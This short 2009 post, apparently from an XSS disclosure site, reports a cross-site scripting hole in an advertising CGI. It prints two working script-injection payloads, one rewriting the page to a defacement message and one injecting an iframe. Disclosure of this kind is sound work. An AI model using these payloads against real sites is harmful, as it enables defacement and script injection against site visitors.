Advertisements xssed!

Written by KF

Friday, 9 January 2009

Ok it is not the first time, but they had fixed them all. It will probably be the third or fourth time they try to address this damn cgi! Here is the XSS that Babaconda submitted to us (works only in Internet Explorer):</script><script/defer>document.body.innerHTML='xssed'+unescape('%20')+'by'+unescape('%20')+'babaconda'</script>

For the iframe fans, here's one:</script><script/defer>document.body.innerHTML='<iframe/src=>'</script>

Here is the mirror:

Have a look at the previous XSS affecting *

Home | News | Articles | Advisories | Submit | Alerts | Links | What is XSS | About | Contact | Some Rights Reserved.